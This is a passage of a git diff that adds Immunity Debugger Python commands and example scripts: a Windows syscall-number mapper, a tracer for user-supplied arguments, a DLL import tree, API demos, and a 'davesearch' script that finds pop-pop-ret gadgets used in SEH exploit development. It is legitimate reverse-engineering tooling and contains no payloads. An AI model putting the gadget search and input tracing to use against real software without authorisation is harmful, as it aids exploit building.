+ '0x0015': 'NtAlpcConnectPort',
+ '0x0014': 'NtAlpcCancelMessage',
+ '0x0017': 'NtAlpcCreatePortSection',
+ '0x0016': 'NtAlpcCreatePort',
+ '0x0011': 'NtAllocateUuids',
+ '0x0010': 'NtAllocateUserPhysicalPages',
+ '0x0013': 'NtAlpcAcceptConnectPort',
+ '0x00c8': 'NtOpenThreadTokenEx',
+ '0x00e7': 'NtQueryKey',
+ '0x00e6': 'NtQueryIoCompletion',
+ '0x00cf': 'NtProtectVirtualMemory',
+ '0x00ce': 'NtPrivilegedServiceAuditAlarm',
+ '0x00cd': 'NtPrivilegeObjectAuditAlarm',
+ '0x00cc': 'NtPrivilegeCheck',
+ '0x00cb': 'NtPowerInformation',
+ '0x00ca': 'NtPlugPlayControl',
+ 'NA': 'NtWriteErrorLogEntry',
+ '0x001e': 'NtAlpcDeleteSecurityContext',
+ '0x001d': 'NtAlpcDeleteSectionView',
+ '0x001f': 'NtAlpcDisconnectPort',
+ '0x001a': 'NtAlpcCreateSecurityContext',
+ '0x001c': 'NtAlpcDeleteResourceReserve',
+ '0x001b': 'NtAlpcDeletePortSection',
+ '0x0062': 'NtCreateTransactionManager',
+ '0x0063': 'NtOpenTransactionManager',
+ '0x0069': 'NtCreateResourceManager',
+ '0x0127': 'NtSetDriverEntryOrder',
+ '0x00c9': 'NtOpenTimer',
+ '0x00f4': 'NtQuerySystemEnvironmentValueEx',
+ '0x0068': 'NtRecoverTransactionManager',
+ '0x0051': 'NtQueryInformationTransaction',
+ '0x0050': 'NtOpenTransaction',
+ '0x0053': 'NtPrePrepareEnlistment',
+ '0x0052': 'NtQueryInformationTransactionManager',
+ '0x0055': 'NtCommitEnlistment',
+ '0x0054': 'NtPrepareEnlistment',
+ '0x0057': 'NtRollbackComplete',
+ '0x0056': 'NtReadOnlyEnlistment',
+ '0x0059': 'NtCommitTransaction',
+ '0x0058': 'NtRollbackEnlistment',
+ '0x0118': 'NtSaveKeyEx',
+ '0x0119': 'NtSaveMergedKeys',
+ '0x0110': 'NtRequestWaitReplyPort',
+ '0x0111': 'NtRequestWakeupLatency',
+ '0x0112': 'NtResetEvent',
+ '0x0113': 'NtResetWriteWatch',
+ '0x0114': 'NtRestoreKey',
+ '0x0115': 'NtResumeProcess',
+ '0x018a': 'NtGetMUIRegistryInfo',
+ '0x0117': 'NtSaveKey',
+ '0x005a': 'NtRollbackTransaction',
+ '0x005c': 'NtPrepareComplete',
+ '0x005b': 'NtPrePrepareComplete',
+ '0x005e': 'NtSinglePhaseReject',
+ '0x005d': 'NtCommitComplete',
+ '0x005f': 'NtSetInformationTransaction',
+ '0x0189': 'NtFlushInstallUILanguage',
+ '0x0188': 'NtIsUILanguageComitted',
+ '0x0187': 'NtClearMUILicenseInfo',
+ '0x0186': 'NtGetMUILicenseInfo',
+ '0x0185': 'NtListTransactions',
+ '0x011c': 'NtRollbackSavepointTransaction',
+ '0x011d': 'NtSavepointTransaction',
+ '0x011e': 'NtSavepointComplete',
+ '0x011f': 'NtSecureConnectPort',
+ '0x0180': 'NtShutdownWorkerFactory',
+ '0x0158': 'NtUnloadKey',
+ '0x0159': 'NtUnloadKey2',
+ '0x0154': 'NtTraceEvent',
+ '0x0155': 'NtTraceControl',
+ '0x0156': 'NtTranslateFilePath',
+ '0x0157': 'NtUnloadDriver',
+ '0x0150': 'NtTerminateThread',
+ '0x0151': 'NtTestAlert',
+ '0x0152': 'NtThawRegistry',
+ '0x0153': 'NtThawTransactions',
+ '0x00db': 'NtQueryEvent',
+ '0x00dc': 'NtQueryFullAttributesFile',
+ '0x00da': 'NtQueryEaFile',
+ '0x00df': 'NtQueryInformationJobObject',
+ '0x00dd': 'NtQueryInformationAtom',
+ '0x00de': 'NtQueryInformationFile',
+ '0x002a': 'NtCallbackReturn',
+ '0x002b': 'NtCancelDeviceWakeupRequest',
+ '0x002c': 'NtCancelIoFile',
+ '0x002d': 'NtCancelTimer',
+ '0x002e': 'NtClearEvent',
+ '0x002f': 'NtClose',
+ '0x00ed': 'NtQueryPerformanceCounter',
+ '0x015d': 'NtUnmapViewOfSection',
+ '0x015e': 'NtVdmControl',
+ '0x015f': 'NtWaitForDebugEvent',
+ '0x015a': 'NtUnloadKeyEx',
+ '0x015b': 'NtUnlockFile',
+ '0x015c': 'NtUnlockVirtualMemory',
+ '0x0028': 'NtAreMappedFilesTheSame',
+ '0x0029': 'NtAssignProcessToJobObject',
+ '0x00d0': 'NtPulseEvent',
+ '0x00d1': 'NtQueryAttributesFile',
+ '0x00d6': 'NtQueryDefaultUILanguage',
+ '0x00d7': 'NtQueryDirectoryFile',
+ '0x00d4': 'NtQueryDebugFilterState',
+ '0x00d5': 'NtQueryDefaultLocale',
+ '0x0020': 'NtAlpcImpersonateClientOfPort',
+ '0x0021': 'NtAlpcOpenSenderProcess',
+ '0x0022': 'NtAlpcOpenSenderThread',
+ '0x0023': 'NtAlpcQueryInformation',
+ '0x0024': 'NtAlpcQueryInformationMessage',
+ '0x0025': 'NtAlpcSendWaitReceivePort',
+ '0x0026': 'NtAlpcSetInformation',
+ '0x0027': 'NtApphelpCacheControl',
+ '0x00d2': 'NtQueryBootEntryOrder',
+ '0x00d3': 'NtQueryBootOptions',
+ '0x00d8': 'NtQueryDirectoryObject',
+ '0x010f': 'NtRequestPort',
+ '0x010e': 'NtRequestDeviceWakeup',
+ '0x010d': 'NtReplyWaitReplyPort',
+ '0x010c': 'NtReplyWaitReceivePortEx',
+ '0x010b': 'NtReplyWaitReceivePort',
+ '0x010a': 'NtReplyPort',
+ '0x006d': 'NtCreateEnlistment',
+ '0x006e': 'NtOpenEnlistment',
+ '0x006f': 'NtSetInformationEnlistment',
+ '0x006a': 'NtOpenResourceManager',
+ '0x006b': 'NtGetNotificationResourceManager',
+ '0x006c': 'NtQueryInformationResourceManager',
+ '0x0136': 'NtSetIoCompletion',
+ '0x0137': 'NtSetLdtEntries',
+ '0x0107': 'NtRemoveProcessDebug',
+ '0x0106': 'NtRemoveIoCompletion',
+ '0x0105': 'NtReleaseSemaphore',
+ '0x0104': 'NtReleaseMutant',
+ '0x0103': 'NtRegisterThreadTerminatePort',
+ '0x0102': 'NtReadVirtualMemory',
+ '0x0101': 'NtReadRequestData',
+ '0x0100': 'NtReadFileScatter',
+ '0x0064': 'NtRenameTransactionManager',
+ '0x0065': 'NtRollforwardTransactionManager',
+ '0x0066': 'NtRecoverEnlistment',
+ '0x0067': 'NtRecoverResourceManager',
+ '0x0060': 'NtSetInformationTransactionManager',
+ '0x0061': 'NtSetInformationResourceManager',
+ '0x0109': 'NtReplaceKey',
+ '0x0108': 'NtRenameKey',
+ '0x00d9': 'NtQueryDriverEntryOrder',
+ '0x0116': 'NtResumeThread',
+ '0x008f': 'NtFlushWriteBuffer',
+ '0x008d': 'NtFlushProcessWriteBuffers',
+ '0x008e': 'NtFlushVirtualMemory',
+ '0x008b': 'NtFlushInstructionCache',
+ '0x008c': 'NtFlushKey',
+ '0x008a': 'NtFlushBuffersFile',
+ '0x00a9': 'NtLockRegistryKey',
+ '0x00a8': 'NtLockProductActivationKeys',
+ '0x00a5': 'NtLoadKey2',
+ '0x00a4': 'NtLoadKey',
+ '0x00a7': 'NtLockFile',
+ '0x00a6': 'NtLoadKeyEx',
+ '0x00a1': 'NtIsSystemResumeAutomatic',
+ '0x00a0': 'NtIsProcessInJob',
+ '0x00a3': 'NtLoadDriver',
+ '0x00a2': 'NtListenPort',
+ '0x00ae': 'NtMapUserPhysicalPagesScatter',
+ '0x00ad': 'NtMapUserPhysicalPages',
+ '0x00af': 'NtMapViewOfSection',
+ '0x00aa': 'NtLockVirtualMemory',
+ '0x00ac': 'NtMakeTemporaryObject',
+ '0x00ab': 'NtMakePermanentObject',
+ '0x0086': 'NtEnumerateValueKey',
+ '0x0087': 'NtExtendSection',
+ '0x0084': 'NtEnumerateKey',
+ '0x0085': 'NtEnumerateSystemEnvironmentValuesEx',
+ '0x0082': 'NtEnumerateBootEntries',
+ '0x0083': 'NtEnumerateDriverEntries',
+ '0x0080': 'NtDuplicateObject',
+ '0x0081': 'NtDuplicateToken',
+ '0x0088': 'NtFilterToken',
+ '0x0089': 'NtFindAtom',
+ '0x014c': 'NtSuspendThread',
+ '0x014b': 'NtSuspendProcess',
+ '0x014a': 'NtStopProfile',
+ '0x014f': 'NtTerminateProcess',
+ '0x014e': 'NtTerminateJobObject',
+ '0x014d': 'NtSystemDebugControl',
+ '0x0149': 'NtStartProfile',
+ '0x0148': 'NtSignalAndWaitForSingleObject',
+ '0x0143': 'NtSetTimerResolution',
+ '0x0142': 'NtSetTimer',
+ '0x0141': 'NtSetThreadExecutionState',
+ '0x0140': 'NtSetSystemTime',
+ '0x0147': 'NtShutdownSystem',
+ '0x0146': 'NtSetVolumeInformationFile',
+ '0x0145': 'NtSetValueKey',
+ '0x0144': 'NtSetUuidSeed',
+ '0x0037': 'NtCreateDebugObject',
+ '0x0036': 'NtContinue',
+ '0x0035': 'NtConnectPort',
+ '0x0034': 'NtCompressKey',
+ '0x0033': 'NtCompleteConnectPort',
+ '0x0032': 'NtCompareTokens',
+ '0x0031': 'NtCompactKeys',
+ '0x0030': 'NtCloseObjectAuditAlarm',
+ '0x0039': 'NtCreateEvent',
+ '0x0038': 'NtCreateDirectoryObject',
+ '0x00e1': 'NtQueryInformationProcess',
+ '0x00e0': 'NtQueryInformationPort',
+ '0x00e3': 'NtQueryInformationToken',
+ '0x00e2': 'NtQueryInformationThread',
+ '0x00e5': 'NtQueryIntervalProfile',
+ '0x00e4': 'NtQueryInstallUILanguage',
+ '0x0138': 'NtSetLowEventPair',
+ '0x0139': 'NtSetLowWaitHighEventPair',
+ '0x00e9': 'NtQueryMutant',
+ '0x00e8': 'NtQueryMultipleValueKey',
+ '0x0134': 'NtSetInformationToken',
+ '0x0135': 'NtSetIntervalProfile',
+ '0x0132': 'NtSetInformationProcess',
+ '0x0133': 'NtSetInformationThread',
+ '0x0130': 'NtSetInformationKey',
+ '0x0131': 'NtSetInformationObject',
+ '0x003f': 'NtCreateKey',
+ '0x003e': 'NtCreateJobSet',
+ '0x003d': 'NtCreateJobObject',
+ '0x003c': 'NtCreateIoCompletion',
+ '0x003b': 'NtCreateFile',
+ '0x003a': 'NtCreateEventPair',
+ '0x00fd': 'NtRaiseException',
+ '0x012d': 'NtSetInformationDebugObject',
+ '0x013e': 'NtSetSystemInformation',
+ '0x00ea': 'NtQueryObject',
+ '0x00ec': 'NtQueryOpenSubKeysEx',
+ '0x00eb': 'NtQueryOpenSubKeys',
+ '0x00ee': 'NtQueryQuotaInformationFile',
+ '0x00fb': 'NtQueryVolumeInformationFile',
+ '0x00ef': 'NtQuerySection',
+ '0x013f': 'NtSetSystemPowerState',
+ '0x013d': 'NtSetSystemEnvironmentValueEx',
+ '0x00fc': 'NtQueueApcThread',
+ '0x013b': 'NtSetSecurityObject',
+ '0x013c': 'NtSetSystemEnvironmentValue',
+ '0x013a': 'NtSetQuotaInformationFile',
+ '0x011a': 'NtClearSavepointTransaction',
+ '0x00c3': 'NtOpenSemaphore',
+ '0x011b': 'NtClearAllSavepointsTransaction',
+ '0x00c2': 'NtOpenSection',
+ '0x0184': 'NtMapCMFModule',
+ '0x0183': 'NtQueryLicenseValue',
+ '0x0181': 'NtCreateThreadEx'}}
+
+
+
+
+def usage(imm):
+
+ imm.Log("!syscall PyCommand (c) Immunity Inc.")
+ imm.Log("Usage: !syscall -m [-f ]")
+ imm.Log("-m Module to be analyzed. (Required)")
+ imm.log("-f Specify a filename to log all information to. (Optional)")
+
+def main(args):
+
+ imm = Debugger()
+
+ log_file = None
+ module = ""
+ error = False
+
+ try:
+ opts,argo = getopt.getopt(args, "m:f")
+ except:
+ return usage(imm)
+
+ for o,a in opts:
+ if o == "-m":
+ module = a
+ if o == "-f":
+ log_file = a
+
+ # We key into the syscall_table using the OS
+ # getOsInformation returns ["Windows", "XP", "5.1.2600"]
+ global syscall_table
+ syscall_key = imm.getOsInformation()[1]
+
+ # Analyse the binary, and then grab all of the
+ # functions
+ executable = imm.getModule( module )
+
+ if executable is None:
+ imm.Log("[*] Error finding module, please check the filename.")
+ return usage(imm)
+
+ exec_base = executable.getCodebase()
+
+ if not executable.isAnalysed():
+ imm.analyseCode( exec_base )
+
+ # In ImmLib you can use assembly instructions and wildcard
+ # search patterns the CONST below means match against any
+ # constants used as as operand
+ syscall_sig = "MOV EAX, CONST \n \
+ MOV EDX, 0x7FFE0300 \n \
+ CALL [EDX]"
+
+ address_list= imm.searchCommandsOnModule( exec_base, syscall_sig )
+
+ syscall_count = 0
+ for address in address_list:
+
+ # Simply decode the function that this call
+ # resides in
+ address = int(address[0])
+ resident_function = imm.decodeAddress( address )
+
+ # Attempt to map the opcode from our syscall table
+ #syscall_number = str(imm.Disasm( function_head ).getOpData()[0])
+ opcode = imm.Disasm( address )
+ instructions = opcode.getResult()
+
+ # This is testing whether its a false-positive, just
+ # means our search picked up the same binary pattern
+ if "MOV EAX" not in instructions:
+ imm.Log("Werd")
+ continue
+
+ syscall_number = "0x%04x" % opcode.getOpData()[0]
+
+ if syscall_table[syscall_key].has_key( syscall_number ):
+ syscall_count += 1
+ syscall_name = syscall_table[syscall_key][syscall_number]
+ imm.setComment(address, "Syscall: %s" % syscall_name)
+
+ log_message = "[*] Syscall: %s (%s) from %s" % ( syscall_name, syscall_number, resident_function )
+ imm.Log( "%s" % log_message, address = address)
+
+ # I do this for every iteration in case there is a failure
+ # we at least get the information logged as far as we could
+ if log_file is not None:
+
+ try:
+ fd = open(log_file,"w")
+ fd.write( log_message )
+ fd.close()
+ except IOError:
+ error = True
+ log_file
+
+ imm.Log("[*] %d syscalls discovered - check log window for output." % syscall_count)
+
+ if error == True:
+ imm.Log("[*] Unable to save to log file, please check pathname and permissions.")
+
+ return "[*] %d syscalls discovered - check log window for output." % syscall_count
\ No newline at end of file
diff --git a/1.73/PyCommands/template.py b/1.73/PyCommands/template.py
new file mode 100755
index 0000000..a652676
--- /dev/null
+++ b/1.73/PyCommands/template.py
@@ -0,0 +1,65 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+Immunity PyCommand Template
+
+"""
+
+__VERSION__ = '0.0'
+
+import immlib
+import getopt
+
+DESC= "Immunity PyCommand Template" #description used by PyCommands GUI
+
+def usage(imm):
+ """ All the options"""
+ imm.Log("!template example command")
+ imm.Log("!template [-a] [-b] [-c] ",focus=1) # focus the usage
+
+
+def main(args):
+ imm = immlib.Debugger()
+
+ if not args:
+ imm.Log("### Immunity's PyCommand template ###")
+ return "Command ok - no args"
+ try:
+ opts, argo = getopt.getopt(args, "a:bc:")
+ except getopt.GetoptError: #get args, if error, show usage
+ usage(imm)
+ return "Bad argument %s" % args[0]
+
+ #parsing args
+ for o,a in opts:
+ if o == "-a":
+ #processing args
+ ret=processA(imm,a)
+ elif o == "-b":
+ ret=processB(imm,a)
+ elif o == "-c":
+ ret=processC(imm,a)
+
+ #ret is the string shown at status bar
+ return ret
+
+
+
+def processA(imm,arg):
+ """do whatever"""
+ imm.Log("Argument received: %s" % str(arg))
+ return "Command ok with: %s" %str(arg) #string, string, string!
+
+def processB(imm,arg):
+ imm.Log("Argument received: %s" % str(arg))
+ return "Command ok with: %s" %str(arg)
+
+def processC(imm,arg):
+ imm.Log("Argument received: %s" % str(arg))
+ return "Command ok with: %s" %str(arg)
+
\ No newline at end of file
diff --git a/1.73/PyCommands/traceargs.py b/1.73/PyCommands/traceargs.py
new file mode 100755
index 0000000..a19dd83
--- /dev/null
+++ b/1.73/PyCommands/traceargs.py
@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+Traceargs example
+
+"""
+
+__VERSION__ = '1.0'
+
+DESC="""TraceArgs -> Find User supplied arguments into a given function"""
+
+import immlib
+import immutils
+import getopt
+modarg = []
+visited = []
+COUNT = 100 # LOOP LIMIT
+
+def usage(imm):
+ imm.Log( "!traceargs Find user-supplied arguments into a given function" )
+ imm.Log( "!traceargs -a ADDRESS -n ARG <-s> <-b>" )
+ imm.Log(" -a ADDRESS Address of the function")
+ imm.Log(" -n ARG Argument number you want to look for")
+ imm.Log(" -s Wheter or not, show all the result (including non user-supplied)")
+ imm.Log(" -b Wheter or not, breakpoint on the calling instructions")
+
+def main(args):
+ imm=immlib.Debugger()
+ if not args:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ try:
+ opts, argo = getopt.getopt(args, "a:n:sb")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ funcaddress = 0
+ tracedarg = 0
+ shownonusersupplied = False
+ breakpointoncall = False
+
+ for o,a in opts:
+ if o == '-a':
+ try:
+ funcaddress = int( a, 16 )
+ except ValueError:
+ usage(imm)
+ return "Wrong Address (%s) % " % a
+ elif o == '-n':
+ try:
+ tracedarg = int( a, 16 )
+ except ValueError:
+ usage(imm)
+ return "Wrong Trace Arg (%s) % " % a
+ elif o == '-s':
+ shownonusersupplied = True
+ elif o == '-b':
+ breakpointoncall = True
+
+ if not funcaddress:
+ usage(imm)
+ return "Wrong Arguments. Address is missing"
+ if not tracedarg:
+ usage(imm)
+ return "Wrong Arguments. Trace Argument is missing"
+ references = imm.getXrefFrom( funcaddress )
+ for ref in references:
+
+ ret = imm.getTraceArgs( ref[0], tracedarg, shownonusersupplied)
+ if ret:
+ ( op, show ) = ret
+ imm.Log("Found user-supplied for arg_%d in %s" % ( tracedarg, imm.disasm(ref[0]).result) , address = ref[0])
+ if hasattr(op, 'type'): type = op.type
+ else: type=""
+
+ imm.Log( "%s %s" % (op.getDisasm(), type), address = op.getAddress() )
+ for msg in show:
+ imm.Log( msg.getDisasm(), address = msg.getAddress() )
+ imm.Log("------")
+ if breakpointoncall:
+ imm.setBreakpoint( ref[0] )
+
+ return 0
\ No newline at end of file
diff --git a/1.73/PyCommands/treedll.py b/1.73/PyCommands/treedll.py
new file mode 100755
index 0000000..c874943
--- /dev/null
+++ b/1.73/PyCommands/treedll.py
@@ -0,0 +1,123 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2008
+
+
+U{Immunity Inc.}
+
+Tree Dll
+
+"""
+
+__VERSION__ = '1.0'
+
+DESC="""Creates imported dll tree"""
+
+import immlib
+import immutils
+import getopt
+
+
+class Node:
+ def __init__(self, name):
+ self.name = name
+ self.imports = []
+ def getName(self, name):
+ return name
+ def getImports(self):
+ return self.imports
+ def addImport(self, tl):
+ self.imports.append( tl )
+
+class DLLTree:
+ def __init__(self, imm, entry = "", maxlevel = 3):
+ self.imm = imm
+ if not entry:
+ self.entry = imm.getDebuggedName()
+ else:
+ self.entry = entry
+ self.node = None
+ self.maxlevel = maxlevel
+ self.sym = None
+
+ def Initalize(self):
+ self.sym = self.imm.getAllSymbols()
+
+ def Get(self):
+ if not self.sym:
+ self.Initalize()
+ self.tree = {}
+ self.checked = {}
+ self.node = self.buru(self.entry)
+ return self.node
+
+ def Show(self):
+ if not self.node:
+ self.Get()
+
+ self.showNodeTree(self.node, 0, 0)
+
+ def showNodeTree(self, node, num, level):
+ if level >= self.maxlevel:
+ return
+ self.imm.Log(" " * num + node.name)
+ self.checked[ node.name ] = 1
+ for n in node.getImports():
+ self.showNodeTree(n, num + 2, level+1)
+
+ def buru(self, name):
+ if name in self.checked.keys():
+ return None
+ tl = []
+ self.checked[name] = Node( name )
+ try:
+ tl = self.getAssociatedDLL(name)
+ except Exception, msg:
+ self.imm.Log("Exception: %s" % str(msg))
+
+ for nn in tl:
+ if nn != name:
+ node = self.buru( nn )
+ if not node:
+ node = self.checked[nn]
+ self.checked[name].addImport( node )
+ return self.checked[name]
+
+ def getAssociatedDLL(self, name):
+ if not self.sym:
+ self.Initalize()
+
+ tl = {}
+ if name not in self.sym:
+ raise Exception, "Entry not a dll found: %s" % name
+ symbols = self.sym[name]
+ for a in symbols.keys():
+ s = symbols[a]
+ #self.imm.Log("%s | %s " % (s.type, s.name))
+ if s.type[:6] == "Import":
+ sname = s.name.split(".",1)[0].lower() + ".dll"
+ if sname not in tl.keys():
+ tl[sname] = 1
+ return tl.keys()
+
+def main(args):
+ imm=immlib.Debugger()
+ try:
+ opts, argo = getopt.getopt(args, "p:l:")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ processname = ""
+ level = 3
+
+ for o,a in opts:
+ if o == '-p':
+ processname = a
+ elif o == '-l':
+ level = int(a, 16)
+
+ d = DLLTree(imm, processname, level)
+ d.Show()
+
diff --git a/1.73/PyCommands/usage.py b/1.73/PyCommands/usage.py
new file mode 100755
index 0000000..974b114
--- /dev/null
+++ b/1.73/PyCommands/usage.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004 - 2007
+
+
+U{Immunity Inc.}
+
+"""
+
+
+__VERSION__ = '1.0'
+
+import immlib
+
+DESC = "Return the usage information for a python command"
+
+def usage(imm):
+ imm.Log("!usage Returns the usage information for a pytho command")
+
+def main(args):
+ imm = immlib.Debugger()
+ if args:
+ try:
+ mod = __import__(args[0])
+ except ImportError:
+ return "Error: %s is not a python command" % args[0]
+ try:
+ return mod.usage(imm)
+ except AttributeError:
+ return "Sorry, no usage available for this command"
+ else:
+ return "No arguments given"
diff --git a/1.73/PyScripts/davesearch.py b/1.73/PyScripts/davesearch.py
new file mode 100755
index 0000000..d9232b0
--- /dev/null
+++ b/1.73/PyScripts/davesearch.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+"""
+Finder for dave
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+import immlib
+from immutils import *
+def main():
+ imm = immlib.Debugger()
+ result = []
+ #opcode = ["jmp eax", "call eax", "push eax\nret", "pop ebp\nret"]
+ opcode = ["pop rA\npop rB\nret"]
+ for op in opcode:
+
+ addys= imm.searchCommands(op)
+ for ad in addys:
+ #imm.Log( str(ad) )
+ result += imm.searchLong( ad[0] )
+
+ for a in result:
+ imm.Log("Found! %s" % op, address=a )
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
\ No newline at end of file
diff --git a/1.73/PyScripts/example/basicblock.py b/1.73/PyScripts/example/basicblock.py
new file mode 100755
index 0000000..1af96d2
--- /dev/null
+++ b/1.73/PyScripts/example/basicblock.py
@@ -0,0 +1,42 @@
+#!/usr/bin/env python
+"""
+basic block example
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+
+def main():
+ imm = immlib.Debugger()
+ imm.markBegin()
+ func_list = imm.getAllFunctions(0x00400000)
+ imm.Error("%s" % str(func_list))
+ i=0
+ for f in func_list:
+ i=1+i
+ #if i > 4: # show first 4 functs
+ #break
+ function=imm.getFunction(f)
+ basicblocks = function.getBasicBlocks()
+ for bb in basicblocks:
+ imm.log(" BB start: %x - end %x" % (bb.start,bb.end))
+ inst_set=bb.getInstructions(imm)
+ for inst in inst_set:
+ imm.Log(" Inst: %s" % inst.result)
+ totaltime=imm.markEnd()
+ imm.log("Used time: %d seconds" % totaltime)
+
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
+
+
+
\ No newline at end of file
diff --git a/1.73/PyScripts/example/combo_input-ex.py b/1.73/PyScripts/example/combo_input-ex.py
new file mode 100755
index 0000000..d880122
--- /dev/null
+++ b/1.73/PyScripts/example/combo_input-ex.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+"""
+Example Combobox/InputBox file for Immunity Debugger API
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__='1.0'
+
+import immlib
+from immutils import *
+
+
+def main():
+ imm = immlib.Debugger()
+ #combobox example
+ combo_list=["Item a","Item b","Item c","Item d","Item e"]
+ res=imm.comboBox("The title of my combobox", combo_list)
+ imm.Log("Picked Item : %s" % res)
+
+
+ #inputbox example
+ res=imm.inputBox("This is my inputbox")
+ imm.Log("Inputbox String: %s" % res)
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
\ No newline at end of file
diff --git a/1.73/PyScripts/example/customtable_example.py b/1.73/PyScripts/example/customtable_example.py
new file mode 100755
index 0000000..b1d3e7c
--- /dev/null
+++ b/1.73/PyScripts/example/customtable_example.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+"""
+Custom table example
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+from immutils import *
+def main():
+ imm = immlib.Debugger()
+ #create a table, with 2 max columns: Module and Path
+ table=imm.createTable("Custom table: Modules list",["Module","Path"])
+ #get all loaded modules
+ allmodules=imm.getAllModules()
+ for key in allmodules.keys():
+ path=str(allmodules[key].getPath())
+ #add them to table, first arg can be a related address to the row, so clicking into the row will pop
+ #up asm window at the related address
+ table.add(None,[key,path])
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
diff --git a/1.73/PyScripts/example/disasm-forward-backward.py b/1.73/PyScripts/example/disasm-forward-backward.py
new file mode 100755
index 0000000..f6dab25
--- /dev/null
+++ b/1.73/PyScripts/example/disasm-forward-backward.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+"""
+Disassembling back and forward example
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+
+def main():
+ imm=immlib.Debugger()
+ nlines=10 #number of lines to go backward and forward
+
+ address=0x01007403 # be sure to use your own address here
+
+ opcode=imm.disasmBackward(address,nlines)
+ imm.Log("%d lines backward original %d address is: %s" % (nlines,address,opcode.result))
+
+ opcode=imm.disasmForward(address,nlines)
+ imm.Log("%d lines forward original %d address is: %s" % (nlines,address,opcode.result))
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
diff --git a/1.73/PyScripts/example/hook_onAV.py b/1.73/PyScripts/example/hook_onAV.py
new file mode 100755
index 0000000..d067fc7
--- /dev/null
+++ b/1.73/PyScripts/example/hook_onAV.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python
+"""
+Example of using hook class
+Place a hook on Access Violation
+Get hook.run() executed when hook occurs
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+from immlib import AccessViolationHook
+
+
+
+class MyOwnHook(AccessViolationHook):
+ def __init__(self):
+ AccessViolationHook.__init__(self)
+
+ def run(self):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+ regs=imm.getRegs()
+ disassembled=imm.disasm(regs["EIP"])
+ imm.Log("EIP on ACCESS_VIOLATION %s" % str(regs["EIP"]))
+ imm.Log("Disassembled command: %s" % disassembled.result)
+
+
+
+
+
+def main():
+ imm = immlib.Debugger()
+ #lets force an access violation for test porpouses
+ imm.setReg("ESP",0xFFFFFFFF)
+
+ hook = MyOwnHook()
+ hook.add("hookonaccessviolation")
+ imm.Error("Python script finishes here\n\
+Hook stays at debugger core\n\
+Hook will execute on %s" % hooktype)
+
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
+
+
\ No newline at end of file
diff --git a/1.73/PyScripts/example/knowledgedb_ex.py b/1.73/PyScripts/example/knowledgedb_ex.py
new file mode 100755
index 0000000..a6e0cdb
--- /dev/null
+++ b/1.73/PyScripts/example/knowledgedb_ex.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+"""
+Example of using the knowledge methods
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+from immutils import *
+
+
+"""
+Log output for this example:
+
+Saved Object: NOCRASH
+Saved Object: sample_object
+Got from knowledge database: {'EAX' = 0, 'EBX' = -1, 'ESP': 1226236}
+Removed NOCRASH from knowledge database
+"""
+
+def main():
+ imm = immlib.Debugger()
+
+ #adding objects
+ object1={"EAX":0x00000000,"EBX":-1,"ESP":0x0012B5FC}
+ imm.addKnowledge("NOCRASH",object1)
+
+ object2=["just","a","sample"]
+ imm.addKnowledge("sample_object",object2)
+
+ #listing objects
+ knowledge_db=imm.listKnowledge()
+ for object in knowledge_db:
+ imm.Log("Saved Object: %s" %str(object))
+
+
+ #getting objects
+ object_id="NOCRASH"
+ sObject=imm.getKnowledge(object_id)
+ imm.Log("Got from knowledge database: %s" %str(sObject))
+
+ #forgetting object
+ imm.forgetKnowledge(object_id)
+ imm.Log("Removed %s from knowledge database" %object_id)
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
\ No newline at end of file
diff --git a/1.73/PyScripts/example/py_example.py b/1.73/PyScripts/example/py_example.py
new file mode 100755
index 0000000..8967e89
--- /dev/null
+++ b/1.73/PyScripts/example/py_example.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+"""
+Example file for Immunity Debugger API
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+
+
+
+def main():
+ imm = immlib.Debugger()
+ pslist=imm.ps()
+ for process in pslist:
+ imm.Log("Process: %s - PID: %d" % (process[1],process[0]))
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
\ No newline at end of file
diff --git a/1.73/PyScripts/example/searchex.py b/1.73/PyScripts/example/searchex.py
new file mode 100755
index 0000000..4d1683a
--- /dev/null
